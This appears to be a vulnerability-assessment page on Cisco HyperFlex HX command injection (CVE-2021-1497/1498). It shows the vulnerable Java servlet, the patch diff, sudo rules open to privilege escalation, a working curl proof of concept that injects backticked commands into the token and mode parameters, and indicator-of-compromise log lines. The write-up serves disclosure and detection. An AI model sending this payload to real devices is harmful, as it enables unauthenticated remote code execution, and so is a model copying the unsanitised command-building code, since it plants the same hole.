Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Recent assessments:

wvu-r7 at May 18, 2021 12:18am UTC reported:

Attacker value is a little lower because I was able to test only the installer.

CVE-2021-1497/CVE-2021-1498

Command injection in the /storfs-asup endpoint’s token and mode parameters.

Patch

--- unpatched/web.xml	2021-05-17 19:06:17.000000000 -0500
+++ patched/web.xml	2021-05-17 19:06:23.000000000 -0500
@@ -69,17 +69,6 @@
 	</servlet-mapping>

 	<servlet>
-		<servlet-name>Springpath Storfs ASUP</servlet-name>
-		<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>
-		<load-on-startup>1</load-on-startup>
-	</servlet>
-
-	<servlet-mapping>
-		<servlet-name>Springpath Storfs ASUP</servlet-name>
-		<url-pattern>/storfs-asup/*</url-pattern>
-	</servlet-mapping>
-
-	<servlet>
 		<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>
 		<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>
 	</servlet>

Vulnerability

  protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String action = request.getParameter("action");
    if (action == null) {
      String msg = "Action for the servlet need be specified.";
      writeErrorResponse(response, msg);
      return;
    }
    try {
      String token = request.getParameter("token");
      StringBuilder cmd = new StringBuilder();
      cmd.append("exec /bin/storfs-asup ");
      cmd.append(token);
      String mode = request.getParameter("mode");
      cmd.append("  ");
      cmd.append(mode);
      cmd.append("  > /dev/null");
      logger.info("storfs-asup cmd to run : " + cmd);
      ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
      logger.info("Starting the storfs-asup now: ");
      long startTime = System.currentTimeMillis();
      Process p = pb.start();
      InputStream errStream = p.getErrorStream();
      String errMsg = FileUtils.readToString(errStream);
      int exitCode = p.waitFor();
      long timeTaken = System.currentTimeMillis() - startTime;
      logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg);
      errStream.close();
      OutputStream outStream = p.getOutputStream();
      outStream.flush();
      outStream.close();
      if (exitCode != 0)
        throw new Exception(errMsg);
    } catch (IOException ex) {
      logger.error("Failed to generate asup: " + ex);
    } catch (Exception ie) {
      logger.error("Failed to run the /bin/storfs-asup command.");
    } finally {
      logger.info("Done executing asup command. ");
    }
  }



tomcat7@HyperFlex-Installer-4:~$ sudo -l
Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:
    !lecture, tty_tickets, !fqdn

User tomcat7 may run the following commands on HyperFlex-Installer-4:
    (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py
    (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh
    (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh
tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help
Usage: support.py [options]

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        Target directory where the support bundle should go
                        (XXX: This could be a remote host(dir), ex:
                        hostname:/foo). Optional. Default = /tmp
  -i INSTALLDIR, --installdir=INSTALLDIR
                        Install directory for storfs. Optional.
  -k ZKDIR, --zkdir=ZKDIR
                        zookeeper directory for storfs. Optional
  -l LOGDIR, --logdir=LOGDIR
                        log directory for storfs. Optional
  --asupdir=ASUPDIR     asup directory for storfs. Optional
  -c COREDIR, --coredir=COREDIR
                        core directory for storfs. Optional
  -m MANIFESTDIR, --manifestdir=MANIFESTDIR
                        Manifest directory for storfs support. All files with
                        .mfx extension in this directory will be processed.
                        Optional
  --list                List the manifests. Optional
  -f MANIFESTFILES, --manifest-file=MANIFESTFILES
                        Manifest file to use for generating support. Multiple
                        manifest files can be specified. Manifests files are
                        required to have .mfx suffix. Optional (Cannot be with
                        -m option)
  -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR
                        log directory for storfs binary files. Optional
  --hypervdir=HYPERVDIR
                        log directory for hyperv binary files. Optional
  -o TOOLSDIR, --toolsdir=TOOLSDIR
                        Path for storfs tools. Optional
  -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR
                        Path for runtime dir (which contains
                        storfs_running_process.pid files). Optional
  -b BUILDTYPE, --buildtype=BUILDTYPE
                        Build type that was running. Optional. Default = debug
  -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES
                        any additional files/directories (not in manifest)
                        that should be added to the support bundle. Optional.
  --dry-run             Process manifests to make sure that there are no
                        errors
tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx
/opt/springpath/storfs-support/springpath-basic.mfx                    /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx
/opt/springpath/storfs-support/springpath.mfx                          /opt/springpath/storfs-support/springpath-logs.mfx
/opt/springpath/storfs-support/springpath-default-os.mfx               /opt/springpath/storfs-support/springpath-extended.mfx
/opt/springpath/storfs-support/springpath-default-asup.mfx             /opt/springpath/storfs-support/deployment.mfx
/opt/springpath/storfs-support/springpath-mgmt.mfx                     /opt/springpath/storfs-support/springpath-witness.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx     /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx
/opt/springpath/storfs-support/springpath-zookeeper.mfx                /opt/springpath/storfs-support/springpath-default-asup-esx.mfx
/opt/springpath/storfs-support/springpath-default-event-asup.mfx       /opt/springpath/storfs-support/springpath-perf.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx  /opt/springpath/storfs-support/springpath-exhaustive.mfx
tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx
# Springpath manifest file. Contains just basic logs.
# Simplified from springpath-mgmt.mfx
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/var/jail/var/log/springpath"]
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/etc/iptables_node_cluster.rules"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "iptables --list -n -v"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "bom-check.sh"]
["exec", "TIMEOUT=120", "IGNORE_ERROR", "mstcli cluster diag"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli cluster info"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli appliance list"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli datastore list"]
tomcat7@HyperFlex-Installer-4:~$

PoC

wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
*   Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$

IOCs

==> /var/log/nginx/access.log <==
192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1"

==> /var/log/springpath/stBootstrapGuiBackend.log <==
2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id`  `id`  > /dev/null
2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.

==> /var/log/tomcat7/catalina.out <==
2021-05-18-00:54:26.012 INFO  com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id`  `id`  > /dev/null
2021-05-18-00:54:26.012 INFO  com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 INFO  com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 INFO  com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.

==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==
127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5